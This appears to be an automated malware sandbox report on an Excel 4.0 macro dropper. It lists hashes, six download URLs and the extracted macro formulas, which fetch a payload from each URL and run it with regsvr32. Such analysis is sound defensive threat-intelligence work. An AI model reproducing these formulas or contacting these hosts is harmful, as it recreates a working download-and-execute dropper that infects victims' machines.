General

  • Target

    f1511f2f6c2a62bfe913d924eb9fb10f3c488c646fdc4aab01593bae33bdf6e1

  • Size

    45KB

  • Sample

    241111-vk3pss1lew

  • MD5

    69b9d6b799bfe34c410a1e59ddafde8b

  • SHA1

    4f972a7a5940100af75b23229846ecde99929da6

  • SHA256

    f1511f2f6c2a62bfe913d924eb9fb10f3c488c646fdc4aab01593bae33bdf6e1

  • SHA512

    27bb17f555c4e049b971119695c410aa6bcf46a5b447a7a24e17a8787bb7b6695939d445bb9382125d442ca02704d7d3e4e4278363e6ad3188c69850f2fb9840

  • SSDEEP

    768:e+oDxDOevZCwrvt8zdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Ud0U2XCnM:hoDxD8tT5fTR4Lh1NisFYBc3cr+U2USz

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://api.zmotpro.com/totalenvironment/logs/8wdgNaq0x/

http://aetoaluminium.com/wp-admin/gkqyKlzXoc/

http://24studypoint.com/wp-admin/3uEUtb/

https://baicc-ct.org/wp-admin/IwhcfC2sdxoToa/

https://mustknew.com/lovecalculator/osDBhPqx0tB1Vtp/

http://kiski023.com/wp-includes/Requests/Cookie/C/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://api.zmotpro.com/totalenvironment/logs/8wdgNaq0x/","..\enu.ocx",0,0) =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://aetoaluminium.com/wp-admin/gkqyKlzXoc/","..\enu.ocx",0,0)) =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://24studypoint.com/wp-admin/3uEUtb/","..\enu.ocx",0,0)) =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://baicc-ct.org/wp-admin/IwhcfC2sdxoToa/","..\enu.ocx",0,0)) =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://mustknew.com/lovecalculator/osDBhPqx0tB1Vtp/","..\enu.ocx",0,0)) =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://kiski023.com/wp-includes/Requests/Cookie/C/","..\enu.ocx",0,0)) =IF('EFALGV'!D20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\enu.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://api.zmotpro.com/totalenvironment/logs/8wdgNaq0x/

xlm40.dropper

http://aetoaluminium.com/wp-admin/gkqyKlzXoc/

xlm40.dropper

http://24studypoint.com/wp-admin/3uEUtb/

xlm40.dropper

https://baicc-ct.org/wp-admin/IwhcfC2sdxoToa/

xlm40.dropper

https://mustknew.com/lovecalculator/osDBhPqx0tB1Vtp/

xlm40.dropper

http://kiski023.com/wp-includes/Requests/Cookie/C/

Targets

    • Target

      f1511f2f6c2a62bfe913d924eb9fb10f3c488c646fdc4aab01593bae33bdf6e1

    • Size

      45KB

    • MD5

      69b9d6b799bfe34c410a1e59ddafde8b

    • SHA1

      4f972a7a5940100af75b23229846ecde99929da6

    • SHA256

      f1511f2f6c2a62bfe913d924eb9fb10f3c488c646fdc4aab01593bae33bdf6e1

    • SHA512

      27bb17f555c4e049b971119695c410aa6bcf46a5b447a7a24e17a8787bb7b6695939d445bb9382125d442ca02704d7d3e4e4278363e6ad3188c69850f2fb9840

    • SSDEEP

      768:e+oDxDOevZCwrvt8zdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Ud0U2XCnM:hoDxD8tT5fTR4Lh1NisFYBc3cr+U2USz

    Score
    10/10

MITRE ATT&CK Enterprise v15

Tasks